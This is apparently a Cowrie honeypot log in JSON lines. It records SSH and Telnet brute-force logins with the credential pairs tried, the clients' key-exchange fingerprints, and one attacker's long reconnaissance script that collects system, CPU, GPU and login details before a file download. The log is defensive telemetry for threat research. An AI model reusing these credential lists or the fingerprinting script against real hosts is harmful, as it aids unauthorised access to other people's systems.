{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:36:10.291329Z","src_ip":"51.79.164.132","session":"8d45b24459e8"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"administrator123","message":"login attempt [administrator/administrator123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:36:10.657488Z","src_ip":"80.94.95.15","session":"a6cd5ad9cbd3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:10.747035Z","src_ip":"51.79.164.132","session":"8d45b24459e8"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:10.748391Z","src_ip":"51.79.164.132","session":"8d45b24459e8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:11.716072Z","src_ip":"80.94.95.15","session":"a6cd5ad9cbd3"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40256,"dst_ip":"1.2.3.4","dst_port":22,"session":"91f306cb0ea0","protocol":"ssh","message":"New connection: 185.93.89.7:40256 (1.2.3.4:22) [session: 91f306cb0ea0]","sensor":"my-vps","timestamp":"2025-08-28T08:36:14.864654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:36:14.941766Z","src_ip":"185.93.89.7","session":"91f306cb0ea0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:36:14.942490Z","src_ip":"185.93.89.7","session":"91f306cb0ea0"}
{"eventid":"cowrie.login.success","username":"root","password":"Index!","message":"login attempt [root/Index!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:36:15.218732Z","src_ip":"185.93.89.7","session":"91f306cb0ea0"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:15.287221Z","src_ip":"185.93.89.7","session":"91f306cb0ea0"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":38802,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cea95ee1f6b","protocol":"ssh","message":"New connection: 51.79.164.132:38802 (1.2.3.4:22) [session: 3cea95ee1f6b]","sensor":"my-vps","timestamp":"2025-08-28T08:36:33.709991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:36:34.056017Z","src_ip":"51.79.164.132","session":"3cea95ee1f6b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:36:34.056754Z","src_ip":"51.79.164.132","session":"3cea95ee1f6b"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T08:36:35.876877Z","src_ip":"51.79.164.132","session":"3cea95ee1f6b"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:37.353959Z","src_ip":"51.79.164.132","session":"3cea95ee1f6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48842,"dst_ip":"1.2.3.4","dst_port":22,"session":"06835f4d0d73","protocol":"ssh","message":"New connection: 212.227.125.160:48842 (1.2.3.4:22) [session: 06835f4d0d73]","sensor":"my-vps","timestamp":"2025-08-28T08:36:44.390604Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42570,"dst_ip":"1.2.3.4","dst_port":22,"session":"6aeaea1ed084","protocol":"ssh","message":"New connection: 212.227.235.229:42570 (1.2.3.4:22) [session: 6aeaea1ed084]","sensor":"my-vps","timestamp":"2025-08-28T08:36:44.742772Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:44.828044Z","src_ip":"212.227.235.229","session":"6aeaea1ed084"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:36:46.815799Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:36:46.816856Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":34230,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f819d38f65f","protocol":"ssh","message":"New connection: 185.93.89.7:34230 (1.2.3.4:22) [session: 3f819d38f65f]","sensor":"my-vps","timestamp":"2025-08-28T08:36:50.417948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:36:50.418779Z","src_ip":"185.93.89.7","session":"3f819d38f65f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:36:50.436982Z","src_ip":"185.93.89.7","session":"3f819d38f65f"}
{"eventid":"cowrie.login.success","username":"root","password":"index@","message":"login attempt [root/index@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:36:50.476769Z","src_ip":"185.93.89.7","session":"3f819d38f65f"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:50.495714Z","src_ip":"185.93.89.7","session":"3f819d38f65f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64206,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8ad0aa8cb6d","protocol":"ssh","message":"New connection: 217.72.205.35:64206 (1.2.3.4:22) [session: c8ad0aa8cb6d]","sensor":"my-vps","timestamp":"2025-08-28T08:36:53.870973Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:53.872373Z","src_ip":"217.72.205.35","session":"c8ad0aa8cb6d"}
{"eventid":"cowrie.session.connect","src_ip":"201.223.189.52","src_port":53319,"dst_ip":"1.2.3.4","dst_port":23,"session":"5661f82aa353","protocol":"telnet","message":"New connection: 201.223.189.52:53319 (1.2.3.4:23) [session: 5661f82aa353]","sensor":"my-vps","timestamp":"2025-08-28T08:36:55.024435Z"}
{"eventid":"cowrie.login.success","username":"root","password":"password1","message":"login attempt [root/password1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:36:56.912460Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:36:58.962754Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.963465Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.964157Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.965420Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.966750Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.967445Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.968278Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.969568Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.970168Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.970612Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.971094Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.971851Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:36:58.972590Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":34232,"dst_ip":"1.2.3.4","dst_port":22,"session":"7212fca543f5","protocol":"ssh","message":"New connection: 185.93.89.7:34232 (1.2.3.4:22) [session: 7212fca543f5]","sensor":"my-vps","timestamp":"2025-08-28T08:36:59.570685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:36:59.571628Z","src_ip":"185.93.89.7","session":"7212fca543f5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:36:59.590329Z","src_ip":"185.93.89.7","session":"7212fca543f5"}
{"eventid":"cowrie.login.success","username":"root","password":"Index@","message":"login attempt [root/Index@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:36:59.628480Z","src_ip":"185.93.89.7","session":"7212fca543f5"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:36:59.647973Z","src_ip":"185.93.89.7","session":"7212fca543f5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46122,"dst_ip":"1.2.3.4","dst_port":22,"session":"803b2dbc6344","protocol":"ssh","message":"New connection: 51.79.164.132:46122 (1.2.3.4:22) [session: 803b2dbc6344]","sensor":"my-vps","timestamp":"2025-08-28T08:36:59.711485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:36:59.788162Z","src_ip":"51.79.164.132","session":"803b2dbc6344"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:37:00.240973Z","src_ip":"51.79.164.132","session":"803b2dbc6344"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:37:00.325387Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:37:00.326470Z","src_ip":"212.227.125.160","session":"06835f4d0d73"}
